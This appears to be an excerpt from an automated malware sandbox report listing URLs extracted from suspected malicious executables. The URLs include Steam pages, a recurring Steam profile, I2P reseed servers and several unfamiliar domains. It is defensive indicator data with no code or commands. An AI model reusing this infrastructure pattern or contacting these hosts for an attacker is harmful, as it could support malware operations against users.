Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/promo/stickers.js?v=upl9NJ5D2xkP&l=en
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/prototype-1.7.js?v=.55t44gwuwgvw
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/reportedcontent.js?v=dAtjbcZMWhSe&l=e
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=OeNIgrpEF8tL
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/javascript/webui/clientcom.js?v=54OKIvHlOQzF&l=e
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/buttons.css?v=PUJIfhtcQn7W&l=english
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/motiva_sans.css?v=-DH0xTYpnVe2&l=engl
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_global.css?v=_D2Bg4UEaFxK&l=en
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/css/shared_responsive.css?v=sHIIcMzCffX6&
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_logo.png
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_global.js?v=REEGJU1hwkYl&am
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=pSv
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://community.akamai.steamstatic.com/public/shared/javascript/tooltip.js?v=.zYHOpI1L3Rt0
Source: file.exe, 00000000.00000002.2767835795.0000000019760000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768175135.000000001B55F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2722820114.000000001B55F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/T23eBL4EHswiSaF6kya2gYsRHvdfADK-NYjs1mVRNGE.3351.jpg
Source: file.exe, 00000000.00000002.2767835795.0000000019760000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2768175135.000000001B55F000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2722820114.000000001B55F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg
Source: file.exe, 00000000.00000003.2362409222.000000001B585000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: file.exe, 00000000.00000003.2362409222.000000001B585000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: file.exe, 00000000.00000003.2362409222.000000001B585000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://help.steampowered.com/
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://help.steampowered.com/en/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr	String found in binary or memory: https://i2p.ghativega.in/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr	String found in binary or memory: https://i2p.mooo.com/netDb/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr	String found in binary or memory: https://i2p.novg.net/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr	String found in binary or memory: https://i2pd.readthedocs.io/en/latest/user-guide/configuration/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr	String found in binary or memory: https://i2pseed.creativecowpat.net:8443/
Source: file.exe, 00000000.00000003.2722820114.000000001B55F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4Qqm4pLk4pqk4pbW1pbWfpbW7ReNxR3UIG8zInwYIFIVs9eYi
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr	String found in binary or memory: https://legit-website.com/i2pseeds.su3
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://login.steampowered.com/
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://lv.queniujq.cn
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://medal.tv
Source: file.exe, 00000000.00000002.2783489358.00000000417CC000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502822954.000000001B566000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2395376073.000000001B579000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2771309518.0000000023AAE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2502799257.000000001B564000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2778975346.00000000358FF000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2773812386.0000000029A18000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://mozilla.org0/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr	String found in binary or memory: https://netdb.i2p2.no/
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://player.vimeo.com
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://recaptcha.net/recaptcha/;
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr	String found in binary or memory: https://reseed-fr.i2pd.xyz/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr	String found in binary or memory: https://reseed-pl.i2pd.xyz/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr	String found in binary or memory: https://reseed.diva.exchange/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.00000000044A4000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.00000000044A2000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, i2p.conf.23.dr	String found in binary or memory: https://reseed.i2p-projekt.de/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr	String found in binary or memory: https://reseed.i2pgit.org/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr	String found in binary or memory: https://reseed.memcpy.io/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr	String found in binary or memory: https://reseed.onion.im/
Source: BFCAAEHJDB.exe, 00000007.00000003.2859028722.000000000437F000.00000004.00000020.00020000.00000000.sdmp, BFCAAEHJDB.exe, 00000007.00000003.2850857977.000000000437D000.00000004.00000020.00020000.00000000.sdmp, euasv89vr56qz5toefmgc1.exe, 0000000E.00000000.2871865920.00007FF67096E000.00000008.00000001.01000000.0000000C.sdmp, main.exe, main.exe, 00000017.00000002.3442752199.00007FFD940A4000.00000002.00000001.01000000.00000011.sdmp, main.exe, 00000017.00000002.3440296730.000001E398B72000.00000004.00000020.00020000.00000000.sdmp, main.exe, 00000017.00000002.3441085501.000001E398F9D000.00000004.00000020.00020000.00000000.sdmp, KXEmxT2p.23.dr	String found in binary or memory: https://reseed2.i2p.net/
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://s.ytimg.com;
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://sketchfab.com
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steam.tv/
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast-test.akamaized.net
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcast.akamaized.net
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://steambroadcastchat.akamaized.net
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://steamcommunity.com/
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://steamcommunity.com/discussions/
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199747278259
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://steamcommunity.com/market/
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://steamcommunity.com/my/wishlist/
Source: file.exe, file.exe, 00000000.00000003.2269115043.00000000024FE000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762584884.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000400000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000002.2762253914.00000000024F3000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2206480841.00000000040D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/badges
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259/inventory/
Source: file.exe, 00000000.00000002.2762584884.00000000040A0000.00000040.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000400000.00000040.00000001.01000000.00000003.sdmp, file.exe, 00000000.00000003.2206480841.00000000040D0000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://steamcommunity.com/profiles/76561199747278259gi_z2Mozilla/5.0
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://steamcommunity.com/workshop/
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://store.steampowered.com/
Source: file.exe, 00000000.00000003.2228501229.000000000252E000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://store.steampowered.com/;
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://store.steampowered.com/about/
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://store.steampowered.com/explore/
Source: file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://store.steampowered.com/legal/
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://store.steampowered.com/mobile
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://store.steampowered.com/news/
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://store.steampowered.com/points/shop/
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://store.steampowered.com/privac
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://store.steampowered.com/privacy_agreement/
Source: file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://store.steampowered.com/stats/
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://store.steampowered.com/steam_refunds/
Source: file.exe, 00000000.00000003.2228501229.0000000002522000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2762253914.000000000251A000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000003.2269076483.0000000002529000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.2761033099.0000000000438000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: https://store.steampowered.com/subscriber_agreement/
